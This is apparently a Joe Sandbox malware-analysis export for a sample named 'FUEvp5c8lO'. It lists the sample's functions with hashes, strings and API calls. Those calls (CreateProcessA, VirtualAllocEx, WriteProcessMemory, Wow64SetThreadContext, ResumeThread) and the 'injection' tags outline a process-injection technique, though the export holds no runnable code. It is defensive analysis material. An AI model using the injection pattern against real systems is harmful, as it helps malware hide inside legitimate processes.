Opcode ID: 7baa7c0f4b860e2d17a20609e31f729eedee8ed455299712f8a93cfbed6d5259
Instruction ID: 5407599195e9851b91a40958a6b27a509e27581693ebd36544a9b5af46081210
Opcode Fuzzy Hash: 7baa7c0f4b860e2d17a20609e31f729eedee8ed455299712f8a93cfbed6d5259
Instruction Fuzzy Hash: FE912AB4D24209DFDB48CFE5E5805AEFBB6EF89350F10A42AE51ABB664D730A501CF40

Function 073896C6 Relevance: 2.7, Strings: 2, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

UC;", xrefs: 073898B6
TuA, xrefs: 07389838

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: TuA$UC;"
API String ID: 0-2071649361
Opcode ID: 1b3cc384fdd849a379ef432d8d6a6a88f37926227dc6c39b8716f9ced71ea842
Instruction ID: 0612de94c8fb0cf12a2f344eec1f9718e969d2969b4462354b08a53338ae490b
Opcode Fuzzy Hash: 1b3cc384fdd849a379ef432d8d6a6a88f37926227dc6c39b8716f9ced71ea842
Instruction Fuzzy Hash: 7C912AB4D24209DFDB48CFE5E5805AEFBB6EF89350F10942AE51ABB664D730A541CF40

Function 07380B3D Relevance: 1.5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

Strings

z^I, xrefs: 07380D51

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: z^I
API String ID: 0-307258731
Opcode ID: 2adf2a831b8747be75fe94cebc3467425ab460be2406516237d414fd84d2b54c
Instruction ID: 26702a3a74401ad98756af929bbe7e2b352025beea99ca376b647f1e8c8737bf
Opcode Fuzzy Hash: 2adf2a831b8747be75fe94cebc3467425ab460be2406516237d414fd84d2b54c
Instruction Fuzzy Hash: 24A126B5E142498FDB48CFAAC9406DEFBB2EF8A310F14802AD419BB365D7349945CF64

Function 07380B77 Relevance: 1.5, Strings: 1, Instructions: 225COMMON

Download Yara Rule

Strings

z^I, xrefs: 07380D51

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: z^I
API String ID: 0-307258731
Opcode ID: 2535a1812cf20551caa58523a3b74c8ea0958c92f8e6623cd32c1e63888d577a
Instruction ID: 0fe574fa57076f742f54b21afc752eb9f5ed407fa6e2f4dd3e77bb76d493f1e6
Opcode Fuzzy Hash: 2535a1812cf20551caa58523a3b74c8ea0958c92f8e6623cd32c1e63888d577a
Instruction Fuzzy Hash: 3CA103B5E102598FDB48CFAAC584A9EFBB2FF89300F24902AD419BB354D7349945CF64

Function 07380B90 Relevance: 1.5, Strings: 1, Instructions: 219COMMON

Download Yara Rule

Strings

z^I, xrefs: 07380D51

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: z^I
API String ID: 0-307258731
Opcode ID: a681efd4769e09f7becbcdf3d90b0d947a5aa5f1ec69cf5040428f1aa81c8d04
Instruction ID: e9cd28c14af11d1fe35a32cb7be60400618fc3db30777a824d04814692415110
Opcode Fuzzy Hash: a681efd4769e09f7becbcdf3d90b0d947a5aa5f1ec69cf5040428f1aa81c8d04
Instruction Fuzzy Hash: BC91F3B4E102198FDB48CFAAC584A9EFBB6FF89300F24902AD419BB354D7349945CF64

Function 07388090 Relevance: 1.4, Strings: 1, Instructions: 180COMMON

Download Yara Rule

Strings

5=6, xrefs: 073881CE

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: 5=6
API String ID: 0-2897083178
Opcode ID: 75c6b6f091aa3aa75ac1fae8d0788f8e756217abb1622a69b65015e582a81e56
Instruction ID: e4a14afa2f56786743cb0606cb12112abe63593454ccaf7fd815ebb889577670
Opcode Fuzzy Hash: 75c6b6f091aa3aa75ac1fae8d0788f8e756217abb1622a69b65015e582a81e56
Instruction Fuzzy Hash: 157158B4E2520AAFCB44DFA5D8454AEFBF6FF8A200F00D46AD025F7254DB349A018F55

Function 073880A0 Relevance: 1.4, Strings: 1, Instructions: 176COMMON

Download Yara Rule

Strings

5=6, xrefs: 073881CE

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID: 5=6
API String ID: 0-2897083178
Opcode ID: 98fb847ca72581c081727378753fb9b324807d0218a9e8ad4706c7711d4e0a01
Instruction ID: 851ff852aa4743d650c5d8af74f7cfa50a313b52fcf265731a7d2c9df63346d5
Opcode Fuzzy Hash: 98fb847ca72581c081727378753fb9b324807d0218a9e8ad4706c7711d4e0a01
Instruction Fuzzy Hash: E1613AB4E2520AAFCB44DFA5D4454AEFBF6FF89200F00D46AD025F7254DB349A018F55

Function 07377D98 Relevance: .4, Instructions: 398COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56a0abde9f3a424142477de0e89f31489c9343936d5e53f6d3c73e87fe60885
Instruction ID: c1c4f3045ad1ea9be6c887049ceb44afdbf8773bf46a92b1a2c145f2ef9c00b8
Opcode Fuzzy Hash: d56a0abde9f3a424142477de0e89f31489c9343936d5e53f6d3c73e87fe60885
Instruction Fuzzy Hash: DFE18AB1B017098FEB25DB65C594BAAB7F6EF89300F144469D14A9B390CB39DD02CB61

Function 07375C98 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dbb5720309e06bb4d21270dd4332c19d9bdd55b6f8925284d7f9e6f08667f54
Instruction ID: 53b0cd86a79c8790fa4421059656df9c809a2f4b213535d3deaceefe723f90bc
Opcode Fuzzy Hash: 1dbb5720309e06bb4d21270dd4332c19d9bdd55b6f8925284d7f9e6f08667f54
Instruction Fuzzy Hash: 69713BB1D05219CBEB28CF66C8407EDBBBABF89300F14C1EAD40DA6651EB745A85CF40

Function 07381E7B Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d8fd8bcb612edf5075ea37a5b003e1ee62435255427f92fae8c2eb305795497
Instruction ID: 4735957c09ea74363f4cd575bc361e6384024804e78894b4636c9c3ffd2428e0
Opcode Fuzzy Hash: 1d8fd8bcb612edf5075ea37a5b003e1ee62435255427f92fae8c2eb305795497
Instruction Fuzzy Hash: 1C3108B1E016588FEB19CFA6D8446DEBBF7BFC9300F14C06AD409A6269DB345A46CF50

Function 0737602F Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 369a82bdc452c3b03d0762a8fa8e64e715b00372544ac3650ce8e5481f253970
Instruction ID: a2881a0c939aa48f9ed1f85c2243190de762a2b93585af91fdabbb743338dfd6
Opcode Fuzzy Hash: 369a82bdc452c3b03d0762a8fa8e64e715b00372544ac3650ce8e5481f253970
Instruction Fuzzy Hash: 6AF01CF495E508DBEF259F44D8555F8B7BCFB8B311F4020A1C80E93612DB284A45CF01

Function 07375F79 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 313c64f1c1c139c3cd669a79bc6027548c5c09081e668f3424bc839efda18609
Instruction ID: b33b65de4348805c0fadebca8acea6d100442e7a9ae487d788f546f2b8cc3017
Opcode Fuzzy Hash: 313c64f1c1c139c3cd669a79bc6027548c5c09081e668f3424bc839efda18609
Instruction Fuzzy Hash: C5E0CDF9D5D54CEBEF61DE9074511F4B77CE78B211F0420A5C80DD3A02E2284709CB11

Function 07376210 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86402a016dd9f69e3614b01b4eaebc9419f4ee66f36cb345aa22623e7d2688b8
Instruction ID: b7c9109c1ab5a5735164f462b9ed1e81e74e2750d29982eb58b47e930a47ee8b
Opcode Fuzzy Hash: 86402a016dd9f69e3614b01b4eaebc9419f4ee66f36cb345aa22623e7d2688b8
Instruction Fuzzy Hash: 94D0A79184F684EBEE229A5058730F4FB7C5947011F0524D7C08CE3403C008451DC305

Function 02D0D4C9 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02D0D556
GetCurrentThread.KERNEL32 ref: 02D0D593
GetCurrentProcess.KERNEL32 ref: 02D0D5D0
GetCurrentThreadId.KERNEL32 ref: 02D0D629

Memory Dump Source

Source File: 00000000.00000002.1418590973.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d00000_FUEvp5c8lO.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 4a6b0addf06424c28b57e93ed4e93ff2e089fae8c0994e8af329434b1af03981
Instruction ID: 27e78db0054a79bb114c5035ed1e7ad7b651d002c40ba0ff9bc2fd1952a9446a
Opcode Fuzzy Hash: 4a6b0addf06424c28b57e93ed4e93ff2e089fae8c0994e8af329434b1af03981
Instruction Fuzzy Hash: F95146B09007498FDB14CFAAD548B9EBBF1EF89314F20849AE419A73A0D7749D44CF65

Function 02D0D4D8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 02D0D556
GetCurrentThread.KERNEL32 ref: 02D0D593
GetCurrentProcess.KERNEL32 ref: 02D0D5D0
GetCurrentThreadId.KERNEL32 ref: 02D0D629

Memory Dump Source

Source File: 00000000.00000002.1418590973.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d00000_FUEvp5c8lO.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 2a808cfd074adf49d2b4656f5b1bdfdd9b30f4e78f318633690093d46ff9b7b9
Instruction ID: dc3908b0362b5901e85b75f121d1e4296d4378f310fd9e3dc82e33e2b054ddd6
Opcode Fuzzy Hash: 2a808cfd074adf49d2b4656f5b1bdfdd9b30f4e78f318633690093d46ff9b7b9
Instruction Fuzzy Hash: 755154B09007498FDB14CFAAD548BAEBBF1EF89304F20849AE419A73A0D7749944CF65

Function 0737469A Relevance: 1.7, APIs: 1, Instructions: 245
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073748D6

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 85d8fcf9f05cf452347ec5aef12754a5d5d931b3d1c008f44e4730d5dd48728a
Instruction ID: 186cb31207a863c57bd6c32d14c4976d1870dde5edb74566451d0dc6a4146093
Opcode Fuzzy Hash: 85d8fcf9f05cf452347ec5aef12754a5d5d931b3d1c008f44e4730d5dd48728a
Instruction Fuzzy Hash: EF912BB1D0079ADFEB20CF68C841BEDBBB2BF49310F148569D858A7240DB799985CF91

Function 073746A0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073748D6

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: ba24bed8a7247e071a50ae3e32ea3a3408db3a38a120407e3234c8bf7bae9701
Instruction ID: dcd063981d56c60882153ae89897eaa9b08df20f601b0dbfe60a1139603476b8
Opcode Fuzzy Hash: ba24bed8a7247e071a50ae3e32ea3a3408db3a38a120407e3234c8bf7bae9701
Instruction Fuzzy Hash: 24913CB1D0079ADFEB20CF68C841BEDBBB2BF45310F148569D858A7240DB759985CF91

Function 02D0AE48 Relevance: 1.7, APIs: 1, Instructions: 198
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 02D0B09E

Memory Dump Source

Source File: 00000000.00000002.1418590973.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d00000_FUEvp5c8lO.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 8de670e64caed75fa63d16a5de651d7ae7548bd38ee82483ebb0c4950c26ef17
Instruction ID: 6cdcd974ff5bba4ba33d3ad748758de96cfefc7c93098f534e505ce3c943fc9d
Opcode Fuzzy Hash: 8de670e64caed75fa63d16a5de651d7ae7548bd38ee82483ebb0c4950c26ef17
Instruction Fuzzy Hash: EF7113B0A00B058FD724DF29D48475ABBF2FF88304F108A29E58AD7B90DB75E845CB91

Function 02D044B0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02D059C9

Memory Dump Source

Source File: 00000000.00000002.1418590973.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d00000_FUEvp5c8lO.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 3787ea9b4324c1df27a15dd8f37e066f5d1e75f5f7f32d4e9c2c018233f98246
Instruction ID: 628d87faf5fb5ae9fc3b4c189aef56e9a2d14be3d9ddba61572e3869db72a351
Opcode Fuzzy Hash: 3787ea9b4324c1df27a15dd8f37e066f5d1e75f5f7f32d4e9c2c018233f98246
Instruction Fuzzy Hash: 0B41E370C00719CBEB24CFAAD88479EBBB5BF49304F60806AD408AB361DB756945CF90

Function 02D0590D Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 02D059C9

Memory Dump Source

Source File: 00000000.00000002.1418590973.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d00000_FUEvp5c8lO.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 435449e048654e36bd6f2959762e84a6af7e32acf0afbe93d7bb51ab2ae53ff3
Instruction ID: 2a7b5a7b5cc42648b5e939910254b5e14d8969589692ce17690a2846efe49aa2
Opcode Fuzzy Hash: 435449e048654e36bd6f2959762e84a6af7e32acf0afbe93d7bb51ab2ae53ff3
Instruction Fuzzy Hash: C641B0B0C00719CFEB24CFAAD8847DEBBB5BF49704F60806AD409AB255DB756949CF90

Function 07374417 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073744A8

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 63d27fea64a04ffa5942d6c4848e0ee941d3b3d5b758b3b17767585c876722d2
Instruction ID: 56b2dd34f1c395caf1b2d1e14ab82111941f1748be06299be8c7a7a4f5eadef7
Opcode Fuzzy Hash: 63d27fea64a04ffa5942d6c4848e0ee941d3b3d5b758b3b17767585c876722d2
Instruction Fuzzy Hash: C02127B69003599FDB10CFA9C885BEEBBF1FF48310F14842AE959A7240C7799945CFA0

Function 07374418 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073744A8

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 72821e5fa52ab268ff445afa2646d4eea528b23095398aa417d8fdf218733ec1
Instruction ID: 13bd1579641485079462bc60ba92398e89fe5e8915593013d82f2d5d5dabc7c5
Opcode Fuzzy Hash: 72821e5fa52ab268ff445afa2646d4eea528b23095398aa417d8fdf218733ec1
Instruction Fuzzy Hash: 6B213BB59003599FDB10CFA9C8857EEBBF5FF48310F148429E958A7240D7799944CBA0

Function 07373E40 Relevance: 1.6, APIs: 1, Instructions: 66
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07373EC6

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 2e4f5bec303f01990c0b22d609645791c410a149ff0d599f03b4a5e0471b2c1b
Instruction ID: 49f165fa5d002e93fb0063b69eadd88e0cf49d8f5c7badfa80b3045be7a7b52a
Opcode Fuzzy Hash: 2e4f5bec303f01990c0b22d609645791c410a149ff0d599f03b4a5e0471b2c1b
Instruction Fuzzy Hash: 5B213AB69003499FDB10CFAAC4857EEBBF4FF48310F14842AD459A7640CB789645CFA1

Function 02D0D719 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D0D7A7

Memory Dump Source

Source File: 00000000.00000002.1418590973.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d00000_FUEvp5c8lO.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 9e79c71319d52bdefff3b3245aa97ade3a12f36262327c0be3e0d846629c60ba
Instruction ID: f175ea9f0f4be39e7258b7b5535998826e0864b9a2f55ec92de06f722bbd5936
Opcode Fuzzy Hash: 9e79c71319d52bdefff3b3245aa97ade3a12f36262327c0be3e0d846629c60ba
Instruction Fuzzy Hash: F521E4B5900209EFDB10CF9AD584ADEFBF9FB48314F14846AE918A3350D374A950CF61

Function 07374502 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07374588

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: c5310d84e789944598a56d5a3959d090934effcde1d69723b66d3afe4f389be1
Instruction ID: 25e7a82c2863c365920723e34252cfb827663b0e24e45b3fa3b0f776b8ad6ecf
Opcode Fuzzy Hash: c5310d84e789944598a56d5a3959d090934effcde1d69723b66d3afe4f389be1
Instruction Fuzzy Hash: 192116B58003599FDB10DFAAC8807EEBBF5FF48310F54842AE919A7240D7799944CFA1

Function 07373E48 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07373EC6

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 86878766f7273aecf405a4b648fc398a0fc66d82a17f5aea5dece659b42f9a0b
Instruction ID: 6f8deba7596659f1ca58cd2978872df771bc27184f05bf51ee50844dc4d6ee0f
Opcode Fuzzy Hash: 86878766f7273aecf405a4b648fc398a0fc66d82a17f5aea5dece659b42f9a0b
Instruction Fuzzy Hash: 5A215BB2D003099FDB10DFAAC4857EEBBF4EF48310F14842AD559A7640CB789944CFA1

Function 07374508 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07374588

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 74ab4a513fac9323c323e82c3f9d3665ed7099b7cea162c0f00d9943e6f09ac2
Instruction ID: ea7eff524075106c26b2d4983e7a6b5a2c4fc721d7e17bac9d80d5ca16a69683
Opcode Fuzzy Hash: 74ab4a513fac9323c323e82c3f9d3665ed7099b7cea162c0f00d9943e6f09ac2
Instruction Fuzzy Hash: FD2139B18003599FDB10CFAAC880BEEFBF5FF48310F54842AE918A7240C7799940CBA1

Function 02D0D720 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D0D7A7

Memory Dump Source

Source File: 00000000.00000002.1418590973.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d00000_FUEvp5c8lO.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2fd30191b1afe7e5ef62bd9a1a4577a77eda91799e8f5aebca50a5dc95e125bb
Instruction ID: 9026fc7912ec59f189ea0220c02b750f1f4c845eb55cfbad38574abc9eb27215
Opcode Fuzzy Hash: 2fd30191b1afe7e5ef62bd9a1a4577a77eda91799e8f5aebca50a5dc95e125bb
Instruction Fuzzy Hash: C721E4B5900209AFDB10CF9AD584ADEBBF5FB48310F14841AE918A3350D374A950CF61

Function 07387CB8 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07387D33

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: ebbf376da4b5e72ba3b8bdb27e51d81eb301f8b8b9844ac0f1d792f62daf533a
Instruction ID: bdca1142506b5c8d9bf4488f8d12d3a6ab8906de26fab6b50c5833c12f1ba7dd
Opcode Fuzzy Hash: ebbf376da4b5e72ba3b8bdb27e51d81eb301f8b8b9844ac0f1d792f62daf533a
Instruction Fuzzy Hash: 5F2117B6900249DFDB10DF9AC584BDEFBF4FB48310F10842AE558A7650D3789644CFA1

Function 07387CC0 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 07387D33

Memory Dump Source

Source File: 00000000.00000002.1422022477.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7380000_FUEvp5c8lO.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 561d8e077970e5221789ca64f659d6b902744815a7b807a8045d0e5f90aea081
Instruction ID: 51f42d2e54d3c8a34fe880710550ed9006097264d52c61a1eea424f5cc5db158
Opcode Fuzzy Hash: 561d8e077970e5221789ca64f659d6b902744815a7b807a8045d0e5f90aea081
Instruction Fuzzy Hash: 9A21E7B69007499FDB10DF9AC444BDEFBF4FB48310F108429E558A7250D378A644CFA1

Function 07374357 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073743C6

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0f22a612408aeeb7a9d3b140454dee54bccdfbaf0811d78a880b73e3295e12a7
Instruction ID: 9abcc5e554641259f4552ad364d5b6501b4f9821e65196056a34890cdba606c2
Opcode Fuzzy Hash: 0f22a612408aeeb7a9d3b140454dee54bccdfbaf0811d78a880b73e3295e12a7
Instruction Fuzzy Hash: 0C116A768003499FDB20CFA9D4447EEBFF1EF48310F148819D559A7250C77A9550CF90

Function 07374358 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 073743C6

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 6d5595fdab63693e49e0cca9ef66e4a10eb85268cc5f6f869d46c478059adbec
Instruction ID: 46e943aa15ab5cf7fd5d81696efe248c0aab271a0af16a30f7fc05711ac32cbe
Opcode Fuzzy Hash: 6d5595fdab63693e49e0cca9ef66e4a10eb85268cc5f6f869d46c478059adbec
Instruction Fuzzy Hash: A71149B69003499FDB10DFAAD844BEFBBF5EF48310F148819E519A7250C77AA550CFA1

Function 07373D90 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 07373DFA

Memory Dump Source

Source File: 00000000.00000002.1421995489.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7370000_FUEvp5c8lO.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3b9fd5acec4b7f65dba72242b410a14d7d2ee1474aaad2e8cd9be342f19e6241
Instruction ID: 35e1f92f1b73f6bcdc02e020761619b2bd1a7a5d41eac9eda7fff9cfd4d24d13
